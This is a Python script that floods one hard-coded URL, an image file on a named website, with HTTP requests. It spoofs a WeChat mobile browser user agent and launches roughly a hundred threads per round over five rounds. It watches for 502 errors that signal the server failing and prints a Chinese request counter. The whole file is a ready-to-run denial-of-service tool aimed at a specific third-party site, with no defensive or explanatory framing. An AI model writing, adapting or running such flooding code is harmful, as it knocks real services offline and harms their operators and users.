import requests
import _thread


url = 'https://ghr84.com/style/006.gif'

headers = {
    'User-Agent':'Mozilla/5.0 (Linux; Android 8.1.0; M1813 Build/O11019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/045129 Mobile Safari/537.36 MMWEBID/1221 MicroMessenger/7.0.12.1620(0x27000C37) Process/tools NetType/4G Language/zh_CN ABI/arm64'}
    
def job():
    re = requests.get(url=url, headers=headers)
    if re.status_code == 502 :
        print('502')
    print('OK')
i = 0
while True :
    if i == 5 :
        break
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    _thread.start_new_thread(job, ())
    job()
    i = i + 1
    print('第', i, '次请求')